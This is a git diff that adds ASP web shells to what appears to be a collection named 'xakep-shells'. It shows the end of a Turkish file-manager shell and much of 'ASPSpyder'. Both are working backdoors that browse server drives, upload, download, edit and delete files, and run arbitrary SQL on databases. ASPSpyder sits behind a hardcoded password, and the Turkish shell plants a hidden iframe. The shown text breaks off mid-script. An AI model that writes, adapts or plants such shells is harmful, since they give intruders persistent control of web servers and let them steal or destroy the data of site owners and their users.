+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalýþtýr' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriðini görüntüle
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
+    if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamýyor\nSistem dosyasý olabilir')</script>":Response.End
+CASE 6 'Resim aç
+    Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+    Response.Write "<b><font size=3>Tablolar</font></br><br>"
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objADOX = Server.CreateObject("ADOX.Catalog")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objADOX.ActiveConnection = objConn
+
+    For Each table in objADOX.Tables
+        If table.Type = "TABLE" Then
+            Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+        End If
+    Next
+    hataKontrol
+CASE 8 'database kayýt listele
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    Set objRcs = Server.CreateObject("ADODB.RecordSet")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+
+    Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+    for i=0 to objRcs.Fields.count-1
+        Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+    next
+    Response.Write "</tr>"
+    do while not objRcs.EOF
+        Response.Write "<tr>"
+        for i=0 to objRcs.Fields.count-1
+            Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+        next
+        Response.Write "</tr>"
+        objRcs.MoveNext
+    loop
+    Response.Write "</table><br>"
+    hataKontrol
+CASE 9 'SQL Execute
+    Set objConn = Server.CreateObject("ADODB.Connection")
+    objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+    objConn.ConnectionString = Path
+    objConn.Open
+    objConn.Execute strSQL
+'    Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+    hataKontrol
+CASE 10 'Dosya Editleme
+    set f = objFSO.OpenTextFile(dPath,1)
+    Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+    Response.Write "<input type=hidden name=status value='11'>"
+    Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+    Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+    Response.Write "<input type=submit value=Kaydet><br>"
+    Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;    border-bottom: lightgoldenrodyellow thin solid;    font-family: Courier New, Arial;background-color: navy;'>"
+    Response.Write server.HTMLEncode(f.readAll)
+    Response.Write "</textarea></form></center>"
+    hataKontrol
+CASE 11 'Dosya Kayýt
+    set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+    hataKontrol
+    saveTextFile.Write(dkayit)
+    saveTextFile.close
+    if err<>0 then
+        byMsg = "<font color=red>Not File Edited!</font><br>"
+    else
+        byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+    araBul path,arama
+    hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.Files
+    For Each f1 In fc
+        dosyaAdi = f1.name
+        num = InStrRev(dosyaAdi,".")
+        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+        downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+        response.Write "<font size=2>"
+        select case uzanti
+        case "mdb"
+            Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+        case "asp"
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        case "jpg","gif"
+            Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+        case else
+            Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+        end select
+    Next
+end sub
+
+sub KlasorOku
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    if session("klasoroku")="" then
+        response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+        session("klasoroku")="simdi yazýlýyor"
+    end if
+    For Each f1 In fc
+        Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+    Next
+end sub
+
+function createFileName()
+Randomize
+    fName_ = ""
+    for i=1 to 10
+        fName_ = fName_ & int(Rnd*100)
+    next
+    createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+    path_ = Replace(Replace(path_,"\","/"),"//","/")
+    lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+    if yaziyomu2(lpath_) then
+        fname__ = "0"&createFileName()&"."&Right(path_,3)
+        objFSO.CopyFile path_, lpath_&"\"&fname__
+    else
+        Response.Write("Resim Açýlamýyor.. <br>Ýsterseniz Download Ederek görüntüleyebilirsiniz..")
+    end if
+    resimYol = fname__
+end function
+
+if not popup then
+    Set fc = Nothing
+    Set objFSO = Nothing
+    Response.End
+end if
+%><script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>
\ No newline at end of file
diff --git a/xakep-shells/ASP/aspydrv.asp.txt b/xakep-shells/ASP/aspydrv.asp.txt
new file mode 100644
index 0000000..551807d
--- /dev/null
+++ b/xakep-shells/ASP/aspydrv.asp.txt
@@ -0,0 +1,828 @@
+<%
+Function BufferContent(data)
+	Dim strContent(64)
+	Dim i
+	ClearString strContent
+	For i = 1 To LenB(data)
+		AddString strContent,Chr(AscB(MidB(data,i,1)))
+	Next
+	BufferContent = fnReadString(strContent)
+End Function
+
+Sub ClearString(part)
+	Dim index
+	For index = 0 to 64
+		part(index)=""
+	Next
+End Sub
+
+Sub AddString(part,newString)
+	Dim tmp
+	Dim index
+	part(0) = part(0) & newString
+	If Len(part(0)) > 64 Then
+		index=0
+		tmp=""
+		Do
+			tmp=part(index) & tmp
+			part(index) = ""
+			index = index + 1
+		Loop until part(index) = ""
+		part(index) = tmp
+	End If
+End Sub
+
+Function fnReadString(part)
+	Dim tmp
+	Dim index
+	tmp = ""
+	For index = 0 to 64
+		If part(index) <> "" Then
+			tmp = part(index) & tmp
+		End If
+	Next
+	FnReadString = tmp
+End Function
+
+
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+
+	'String to byte string conversion
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+
+	'Byte string to string conversion
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+
+
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		' output mechanism modified for buffering
+		oFile.Write BufferContent(FileData)
+		oFile.Close
+	End Sub
+
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+
+' Create the FileUploader
+IF REQUEST.QueryString("upload")="@" THEN
+Dim Uploader, File
+Set Uploader = New FileUploader
+
+' This starts the upload process
+Uploader.Upload()
+
+%>
+<html><title>ASPYDrvsInfo</title>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<body bgcolor=black text=white>
+<BR><BR><BR>
+<center><table bgcolor="#505050" cellpadding=4>
+<tr><td><Font face=arial size=-1>File upload Information:</font>
+</td></tr><tr><td bgcolor=black ><table>
+<%
+
+' Check if any files were uploaded
+If Uploader.Files.Count = 0 Then
+	Response.Write "File(s) not uploaded."
+Else
+	' Loop through the uploaded files
+	For Each File In Uploader.Files.Items
+		File.SaveToDisk Request.QueryString("txtpath")
+		Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Uploaded: </font></td><td>" & File.FileName & "</td></tr>"
+		Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(File.FileSize/1024)+1 & " kb</td></tr>"
+		Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File.ContentType & "</td></tr>"
+	Next
+End If
+%>
+<TR><TD>&nbsp;</TD></TR></table>
+</td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " size=+2 >7</font></a></center>
+<%
+response.End() '---- XXX
+END IF
+'--------
+ON ERROR RESUME NEXT
+Response.Buffer = True
+password = "lol" ' <---Your password here
+
+If request.querystring("logoff")="@" then
+	session("shagman")=""	' Logged off
+	session("dbcon")=""		' Database Connection
+	session("txtpath")=""	' any pathinfo
+end if
+
+	If (session("shagman")<>password) and Request.form("code")="" Then
+		%>
+<body bgcolor=black><center><BR><BR><BR><BR><FONT face=arial size=-2 color=#ff8300>ADMINSTRATORS TOOLKIT</FONT><BR><BR><BR>
+<table><tr><td>
+<FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" >
+<table bgcolor=#505050 width="20%" cellpadding=20 ><tr><td bgcolor=#303030 align=center >
+<INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access ">
+</td></tr></table>
+</td></tr><tr><td align=right>
+<font color=white size=-2 face=arial >ASPSpyder Apr2003</font></td></tr>
+</td></tr></table></FORM>
+<%If request.querystring("logoff")="@" then%>
+<font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClick=window.close(this);>CLOSE THIS WINDOW</font>
+<%end if%>
+<center>
+		<%
+		Response.END
+	End If
+	If Request.form("code") = password or session("shagman") = password Then
+		session("shagman") = password
+	Else
+		Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED</B></font><BR><font color=Gray >Copyright 2003 Vela iNC.</font></p>"
+		Response.END
+	End If
+
+server.scriptTimeout=180
+set fso = Server.CreateObject("Scripting.FileSystemObject")
+mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME"))
+mapPathLen = len(mapPath)
+
+if session(myScriptName) = "" then
+	for x = mapPathLen to 0 step -1
+	myScriptName = mid(mapPath,x)
+	if instr(1,myScriptName,"\")>0 then
+		myScriptName = mid(mapPath,x+1)
+		x=0
+		session(myScriptName) = myScriptName
+	end if
+	next
+Else
+	myScriptName = session(myScriptName)
+end if
+
+
+wwwRoot = left(mapPath, mapPathLen - len(myScriptName))
+Target = "D:\hshome\masterhr\masterhr.com\"  ' ---Directory to which files will be DUMPED Too and From
+
+	if len(Request.querystring("txtpath"))=3 then
+		pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form("Fname")
+	else
+		pathname = Request.querystring("txtpath") & "\" & Request.form("Fname")
+	end if
+
+	If Request.Form("txtpath") = "" Then
+	MyPath = Request.QueryString("txtpath")
+	Else
+	MyPath = Request.Form("txtpath")
+	End If
+
+' ---Path correction routine
+	If len(MyPath)=1 then MyPath=MyPath & ":\"
+	If len(MyPath)=2 then MyPath=MyPath & "\"
+	If MyPath = "" Then MyPath = wwwRoot
+	If not fso.FolderExists(MyPath) then
+	Response.Write "<font face=arial size=+2>Non-existing path specified.<BR>Please use browser back button to continue !"
+	Response.end
+	end if
+
+	set folder = fso.GetFolder(MyPath)
+
+if fso.GetFolder(Target) = false then
+	Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size=-1 color=red>" & Target & "<BR></font>"
+else
+	set fileCopy = fso.GetFolder(Target)
+end if
+
+
+	If Not(folder.IsRootFolder) Then
+		If len(folder.ParentFolder)>3 then
+			showPath = folder.ParentFolder & "\" & folder.name
+		Else
+			showPath = folder.ParentFolder & folder.name
+		End If
+	Else
+		showPath = left(MyPath,2)
+	End If
+
+MyPath=showPath
+showPath=MyPath & "\"
+' ---Path correction routine-DONE
+
+set drv=fso.GetDrive(left(MyPath,2))
+
+if Request.Form("cmd")="Download" then
+ if Request.Form("Fname")<>"" then
+	Response.Buffer = True
+	Response.Clear
+	strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname")
+	Set Sys = Server.CreateObject( "Scripting.FileSystemObject" )
+	Set Bin = Sys.OpenTextFile( strFileName, 1, False )
+	Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Request.Form("Fname") )
+	Response.ContentType = "application/octet-stream"
+	While Not Bin.AtEndOfStream
+		Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) )
+	Wend
+	Bin.Close : Set Bin = Nothing
+	Set Sys = Nothing
+ Else
+ 	err.number=500
+	err.description="Nothing selected for download..."
+ End if
+End if
+%>
+<html>
+<style>
+<!--
+A:link {font-style: text-decoration: none; color: #c8c8c8}
+A:visited {font-style: text-decoration: none; color: #777777}
+A:active {font-style: text-decoration: none; color: #ff8300}
+A:hover {font-style: text-decoration: cursor: hand; color: #ff8300}
+*		{scrollbar-base-color:#777777;
+scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-face-color:#505050;
+scrollbar-arrow-color:#ff8300;scrollbar-shadow-color:#303030;scrollbar-highlight-color:#303030;}
+input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:none;border:1px solid #000000;}
+//-->
+</style>
+<%
+'QUERY ANALYSER -- START
+if request.QueryString("qa")="@" then
+'-------------
+sub getTable(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+        	For i = 0 To rs.Fields.Count - 1
+    			myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Verdana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>"
+    		Next
+			myTitle = "<font color=gray size=6 face=webdings>?</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>"
+		rs.MoveFirst
+		rs.PageSize=mNR
+		if int(rs.RecordCount/mNR) < mPage then mPage=1
+        rs.AbsolutePage = mPage
+		Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"
+if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value=""  <<  "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value=""  <<  "">")
+Response.Write "<select name=cmbPageSelect>"
+For x = 1 to rs.PageCount
+	if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</option>") else Response.Write("<option value=" & x & ">" & x & "</option>")
+Next
+Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">"
+if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value=""  >>  "" DISABLED>") else Response.Write("<input type=button name=btnPageNext value=""  >>  "">")
+Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>"
+		response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR align=center valign=middle bgcolor=#777777>" & myFields
+
+        For x = 1 to rs.PageSize
+          If Not rs.EOF Then
+			response.Write "<TR>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>"
+			Next
+			response.Write "</TR>"
+			response.Flush()
+			rs.MoveNext
+		  Else
+		  	x=rs.PageSize
+		  End If
+		Next
+		response.Write "</Table>"
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+		set myDBConnection = nothing
+		set rs2 = nothing
+		set rs = nothing
+    
+End sub
+
+sub getXML(mySQL)
+		if mySQL="" then
+			exit sub
+		end if
+	on error resume next
+	Response.Buffer = True
+    	Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFlag
+		myConnectionString=session("dbCon")
+    	Set myDBConnection = Server.CreateObject("ADODB.Connection")
+    	myDBConnection.Open myConnectionString
+		myFlag = False
+		myFlag = errChk()
+        	set rs = Server.CreateObject("ADODB.Recordset")
+			rs.cursorlocation = 3
+	    	rs.open mySQL, myDBConnection
+			myFlag = errChk()
+	if RS.properties("Asynchronous Rowset Processing") = 16 then
+		Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font color=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>"
+		Response.Write "<textarea cols=75 name=txtXML rows=15>"
+		rs.MoveFirst
+		response.Write vbcrlf & "<?xml version=""1.0"" ?>"
+		response.Write vbcrlf & "<TableXML>"
+		Do While Not rs.EOF
+			response.Write vbcrlf & "<Column>"
+			For i = 0 to rs.Fields.Count - 1
+				response.Write  vbcrlf & "<" & rs.Fields(i).Name & ">"  & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf
+				response.Flush()
+			Next
+			response.Write "</Column>"
+		rs.MoveNext
+		Loop
+		response.Write "</TableXML>"
+		response.Write "</textarea>"	
+		myFlag = errChk()
+
+	else
+		if not myFlag then
+			myTitle = "<font color=#55ff55 size=6 face=webdings>i</font><font color=#ff8300 size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command(s) completed successfully.)</TT><br>"
+			response.Write myTitle
+		end if
+	end if
+End sub
+
+Function errChk()
+	if err.Number <> 0 and err.Number <> 13 then
+		dim myText
+		myText = "<font color=#ff8300 size=4 face=webdings>x</font><font color=red size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>"
+		response.Write myText
+		err.Number = 0
+		errChk = True
+	end if
+end Function
+
+    Dim myQuery,mPage,mNR
+	myQuery = request.Form("txtSQL")
+	if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon")
+	if request.QueryString("txtpath") then session("txtpath")=request.QueryString("txtpath")
+	mPage=cint(request.Form("mPage"))
+	if mPage<1 then mPage=1
+	mNR=cint(request.Form("txtNoRecords"))
+	if mNR<1 then mNR=30
+%>
+<html><title>ASPyQAnalyser</title>
+<script language="VbScript">
+sub cmdSubmit_onclick
